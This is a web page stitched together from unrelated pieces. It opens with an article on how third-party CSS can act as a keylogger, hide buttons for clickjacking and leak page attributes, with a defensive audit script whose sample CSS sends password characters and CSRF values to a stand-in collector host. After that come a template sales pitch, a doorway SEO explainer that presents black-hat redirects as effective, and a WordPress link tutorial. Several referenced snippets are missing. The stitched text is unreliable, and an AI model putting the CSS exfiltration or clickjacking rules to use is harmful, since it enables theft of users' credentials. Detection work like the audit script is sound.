We explain how third-party CSS, JavaScript and other resources loaded from other people's servers can harm your site.
At the end of February, a keylogger that partially relies on CSS appeared on the web. The attack is simple: for each character entered in a field of a certain type (for example, password), a request is sent to a third-party server, disguised as a request for a background image:
The server can log the sequence of requests and easily reconstruct the entered password from it.
In the course of discussing the problem, some suggested that browser vendors work on a fix. Others noted that the problem only affects sites built on React-like frameworks, and shifted the blame to them.
If you add this kind of image to your site, you become dependent on example.com. They can let you down in different ways: for example, they can remove the image, and you will get a 404 instead of an image. Or they can simply replace the cat image with something less pleasant.
You can warn your users that the image was added from a third-party resource and you are not related to it. This will save you some trouble. But of course, when you add a simple picture, you don't give access to the passwords.
This example is much more interesting for example.com, because by adding a script from their site you give them a lot more control over your site. In this case, example.com might:
In other words, now example.com can do a lot of things.
If you do run into a bad script, try using the Clear-Site-Data header.
In terms of its impact on the site, third-party CSS sits between an image and a script. Third-party CSS can:
CSS cannot interact with local storage or embed a cryptominer in the page, but it can still do a lot of harm to the owner of the resource.
This code sends data about the entered character "a" to the handler, disguised as an image request. Repeat the code for each character and you have a CSS keylogger.
By default, browsers don't store user-entered characters in the value attribute, so this trick will work if you use something that synchronizes values like this, like .
Of course, this problem can be solved on the side of React and similar frameworks. But then only a specific case will be solved, and the rest of the problems will remain.
This is, of course, a very peculiar example, but still a working one. Imagine your users seeing an incomprehensible error instead of the usual home page when they visit the site. In the same way, third-party code can remove, for example, the "buy" button or cause some other nuisance.
And just like that, your prices skyrocketed.
```css
.delete-everything-button {
  opacity: 0;
  position: absolute;
  top: 500px;
  left: 300px;
}
```
Take a button that does something terrible, one the user would never click on purpose, make it transparent, and place it where the user is sure to click.
Of course, if the button does something really important, the user will first see a warning dialog. But that's not a problem either: it just needs more CSS. For example, you can change the content of the "Oh my God, no!" button to "Sure, I'm sure."
Imagine that browser makers fixed the keylogger trick. Attackers simply put an extra text field on top of an important password field and they are back in business.
The value and other attributes do not necessarily store passwords: an attacker might find something else of interest.
```html
<input type="hidden" name="csrf" value="1687594325">
<img src="/avatars/samanthasmith83.jpg">
<iframe src="//cool-maps-service/show?st-pancras-london"></iframe>
<img src="/gender-icons/female.png">
<div class="banner users-birthday-today"></div>
```
All of this data can be collected with CSS selectors and sent anywhere the stylesheet's author wants.
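One way to review a third-party stylesheet for the pattern described above (a selector that tests an attribute value, paired with a `url()` fetch to another origin) is a small audit script. This is an added example, not code from the original article; `SITE_ORIGIN`, `collector.example` and the sample rules are constructed for illustration, and the check is a heuristic that covers the keylogger case and the more general attribute-leak case.

```javascript
// Added example: flag CSS rules whose selector tests an attribute value and whose
// body fetches a URL from a foreign origin (one request per matching value).
// SITE_ORIGIN, SAMPLE_CSS and all hostnames are constructed for illustration.
const SITE_ORIGIN = "https://shop.example";

const SAMPLE_CSS = `
/* constructed sample of a third-party stylesheet */
.hero { background: url("/img/hero.png"); }
input[type="password"][value$="a"] { background-image: url("https://collector.example/a"); }
input[name="csrf"][value^="16"] { background: url(//collector.example/csrf?16) }
img[src*="/gender-icons/female"] { list-style-image: url('https://collector.example/g'); }
a[href^="http"] { color: blue; }
input[type="text"] { background: url("https://shop.example/img/field.png"); }
`;

// Attribute selectors that compare a value: [a=v], [a^=v], [a$=v], [a*=v], [a~=v], [a|=v]
const VALUE_MATCH = /\[\s*([\w-]+)\s*[~|^$*]?=\s*[^\]]*\]/g;
const URL_FN = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

function findExfilRules(css, siteOrigin) {
  const findings = [];
  const plain = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments first
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g; // innermost rules, so rules inside @media match too
  for (const [, rawSelector, body] of plain.matchAll(ruleRe)) {
    const selector = rawSelector.trim();
    const attrs = [...selector.matchAll(VALUE_MATCH)].map((m) => m[1].toLowerCase());
    if (attrs.length === 0) continue; // no value test, nothing to leak
    for (const [, , target] of body.matchAll(URL_FN)) {
      let u;
      try {
        u = new URL(target.trim(), siteOrigin); // resolves relative and //host URLs
      } catch {
        continue; // unparsable URL, no request to report
      }
      if (!/^https?:$/.test(u.protocol)) continue; // data: and similar make no request
      if (u.origin !== siteOrigin) findings.push({ selector, attrs, origin: u.origin });
    }
  }
  return findings;
}

for (const f of findExfilRules(SAMPLE_CSS, SITE_ORIGIN)) {
  console.log(`${f.origin} <- ${f.selector} [${f.attrs.join(",")}]`);
}
```

A hit is a prompt for manual review rather than proof of abuse, since legitimate stylesheets also combine attribute selectors with images.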
Any website owner wants to have a beautiful design! So, the question arises, how to get a quality design for a web resource, while quickly and at an affordable price?
Development of website design with the involvement of third-party resources
What are third-party resources? It will not be news to anyone that to create a website, if you do not know where to start yourself, you will need a developer and a designer. When you involve these specialists, be prepared for the fact that the work will not go quickly.
Each specialist has his own vision and each understands in his own way what is “correct”. So be prepared to defend your opinion. All such disputes and alterations take a lot of time, effort and money, since the services of developers and designers are not cheap.
Given the above, the question arises: "Why involve third-party resources to create a site?" Oddly enough, there are certain advantages. Firstly, such cooperation allows you to create a design that is not only beautiful but also completely unique. Secondly, you can implement the layout you have always dreamed of for your web resource, even the most complex one, filled with all sorts of sections and menus of varying complexity.
Create beautiful designs with templates
Templates are ready-made designs that you can use to create a website. If you want to create a site that runs on a specific CMS, you can choose a template designed specifically for that platform.
What are the benefits of using templates? After looking at the screenshots above, or rather at the prices of the layouts offered by TemplateMonster, we can definitely say that the pricing policy for templates is very reasonable.
For little money, you get not only a beautiful design, but also modern functionality. In addition, all templates are customizable, so even if something in the layout design does not suit you, you can change or delete it. Thanks to the clear interface of the admin panel, you can easily figure out the available settings without outside help, which saves a lot of time and budget.
Most of the templates are adaptive, which makes it possible to create a functional site that can work on any type of device. Another characteristic that is clearly worth considering when choosing the right template is versatility!
The TemplateMonster team has developed a type of template that can be used for sites of different kinds, for example, an online store or a blog, as well as for resources on various topics (construction, furniture store, etc.).
And finally, the most important advantage of working with ready-made TemplateMonster layouts is that by purchasing a theme, you get access to free 24/7 technical support. Therefore, if you have any questions about how to install or customize the purchased theme, you can get expert help!
Beautiful website designs are the first step to success! Users who open a site first evaluate it visually, and only then look at what information it contains. So if you want to have a large number of customers, readers or buyers, it is important to grab their attention at first sight so that they do not leave your site forever. But how to do it? That's right, use a beautiful design for your resource that can attract and hold users' interest.
When deciding how to create a site (create from scratch or use a template), it is important to determine the main tasks for the resource, which will allow you to choose the most appropriate way. Of course, you can take on the development of a web page yourself, especially since you know best what you need! But, in this case, a certain level of skills and knowledge is required.
If you don’t have all this, but you really want to do the design for the site yourself, opt for TemplateMonster templates. You don’t need great skills here, and everything is clear even for a novice user!
Doorway (syn. dor, from the English "doorway", or front door) is a black hat SEO tool: a site designed to redirect users to another online resource.
The site is useless from the point of view of the user, who often does not even get the chance to view its page. Doorway sites are often registered on free hosting services.
The text content is often meaningless and consists of fragments of sentences with a huge number of keywords. Such sites only clog the Internet. The main goal of a doorway is to be indexed and get into the search results.
Typology of doorways
With the advent of algorithms, the relevance of resources was calculated based on competent content and a well-organized semantic core. But it was not possible to design resource pages for absolutely all queries while maintaining the readability of the material, which led to the inevitable emergence of doorways. After the advent of link ranking, this method of promotion took its modern form, namely redirecting users to another site and passing on link weight.
Among the doorways, the following types can be conditionally distinguished:
- White doorways are law-abiding sites that may contain copyrighted content and high-quality graphics. Once on such a site, the user can follow the links to get to the promoted resource.
- Gray doorways are sites whose main task is to pass on link weight, so the text materials on such sites are unique and understandable, and the links are inserted into the surrounding text. With the support of the doorways' TIC and PR, the main site can increase its link weight.
- Black doorways are sites whose main task is to automatically redirect users to a third-party resource, which is not welcomed by search engines. To implement this task, meta tags or JavaScript are configured. Nonsensical texts are placed on black doorways because the user will not have time to read them anyway. The main goal is to promote the main site up in search results. So-called dorgens, which "invent" texts containing the required queries, contribute heavily to the creation of doorways.
Doorways and SEO
Doorways are among the effective methods of website optimization. Avoiding penalties from search engines is not difficult: you just have to follow simple rules. It takes a lot of time to create doorways and, in fact, their optimization is no different from the promotion of ordinary resources.
Doorways and search engines
Search engines ban or pessimize sites for promotion via doorways. The Yandex rules say that sites that redirect users to third-party resources will be classified as spam and removed from the index. But only the doorways themselves are banned or pessimized, with the exception of doorways on a subdomain of the main address; the main site remains intact.
In practice, search engines rarely punish doorways, as they can easily confuse them with quite reputable sites (for example, microsoft.ru) that redirect for legitimate reasons.
White and gray doorways cannot be accused of spam at all.
How to deal with them?
As mentioned earlier, it is difficult for search engines to find doorways. Although the algorithms are constantly updated and strive to detect and stop redirect attempts using meta tags and scripts, the development of doorways also does not stand still, and webmasters are constantly adding innovative methods of redirecting users.
The easiest way to add links to third-party resources and links between pages and blog posts in WordPress is to use the Insert/Edit Link tool built into the editor. It is a little more difficult to insert links to a specific paragraph or line within pages and posts, which are formed manually in the HTML code.
Links to third party resources
1. In the browser, open the page of the third-party site to which we want to link, and copy the URL from the address bar to the clipboard.
2. Go to the window for editing your post or page, select the text of the future link or put the cursor in the place where the link should be, and click the button with the hint "Insert/change link" on the text editor toolbar. In previous versions, WordPress immediately opened the main window with the title "Insert/Change Link". If I'm not mistaken, since version 4.5 it opens in a collapsed form with a field for inserting an address and two buttons: "Apply" and "Link settings". The latter button expands the "Insert / change link" window.
3. In the window that opens for adding a link, paste the address from the clipboard and click on the "Apply" button (and if the link text was not previously selected, click the adjacent "Link Settings" button, as in paragraph 5, to add the link text):
Since in the example the link text was selected in advance, the link is ready:
Third party link: Cheap Flights.
4. To change the URL, add or edit the displayed text, the method of opening (in the current or new window), select the link and click the "Change" button in the window that appears:
5. A familiar window will open with a field for adding a URL, in which we press the "Link Settings" button to get a maximized window:
6. The main window "Insert / change link" will open:
In this window, you can check the box next to "Open in a new tab", replace, if necessary, the URL, add or change the text of the link. Since you can insert a link without selecting the text in advance, but by adding it to the "Link Text" field of the "Insert / Edit Link" window, the link will be added to the place where the cursor originally stood. Click the "Update" button.
Links between pages and blog posts
To insert a link to a page or post on your blog, select the text of the link or put the cursor in the place where the link should be added. Click the button on the toolbar "Insert/Edit Link". In the window that opens, click the "Link settings" button, after which the main window "Insert / change link" will open:
From the list in the lower half of the window, select a page or entry and click on it; the URL is inserted automatically. The link text, if not selected in advance, can be entered manually into the appropriate box or pasted from the clipboard by first copying the name of the page or entry directly in the list. If necessary, check the box "Open in a new tab" and, of course, click the "Add link" button. Link to my blog page added:
Link to your blog page: .
Links within pages and posts
To link to a specific location on a page or post, that location must be tagged somehow. To do this, a bookmark is inserted next to it, or, as it is also called, an anchor. By the way, on the "Visual" tab, this bookmark will be marked with an anchor figure. As an example, consider inserting links into the table of contents of this article and inserting bookmarks (anchors) into the titles of the relevant sections to navigate to them from the table of contents.
Bookmarks are inserted in the HTML editor (on the "Text" tab) and are the following construction:
Instead of link1, insert the name of the bookmark.
Instead of link1, insert the name of the bookmark to which you want to follow the link, the # symbol (pound sign, hash) means that it is followed by id. The # without an id in the link indicates the beginning of the page and is used to return to the beginning (up).
Now everything is in order:
1. We come up with a name for the bookmark and go to the HTML editor by selecting the "Text" tab.
2. Insert a bookmark in the right place in the article. I've inserted anchors next to the section headings:
If you place text between the opening and closing tags a, it will be tinted as a link.
3. Insert links to bookmarks in the table of contents:
4. Now you can test, including the "Up" link:
Up
5. The full link to a bookmark looks like this: page URL/#link1. It does not need to be compiled manually: just follow the link to the bookmark and copy the full URL from the address bar. You can use this address to go to the bookmark from other sites.